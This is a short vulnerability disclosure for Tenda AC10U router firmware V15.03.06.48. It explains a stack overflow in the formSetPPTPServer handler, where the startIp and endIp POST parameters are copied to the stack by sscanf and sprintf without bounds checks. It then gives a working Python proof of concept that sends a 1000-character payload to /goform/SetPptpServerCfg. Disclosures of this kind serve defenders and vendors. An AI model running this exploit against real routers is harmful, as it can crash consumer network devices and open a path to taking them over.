- Firmware download website: https://www.tendacn.com/download/detail-3170.html
AC10U v1.0 Firmware V15.03.06.48
The Tenda AC10U v1.0 Firmware V15.03.06.48 firmware has a stack overflow vulnerability in the formSetPPTPServer function. The pptp_server_start_ip variable receives the startIP parameter and the pptp_server_end_ip variable receives the endIP parameter from two POST requests. the value of startIp is formatted using the sscanf function with the format %[^.].%[^.].%[^.].%s. Then variable pptp_server_start_ip and pptp_server_end_each_ip[3] is directly used in a sprintf function and passes to a local variable on the stack, which can override the return address of the function. The user-provided startIP and endIP can trigger this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetPptpServerCfg"
payload = 'a'*1000
data = {"startIp": payload,"endIp": 1}
response = requests.post(url, data=data)
print(response.text)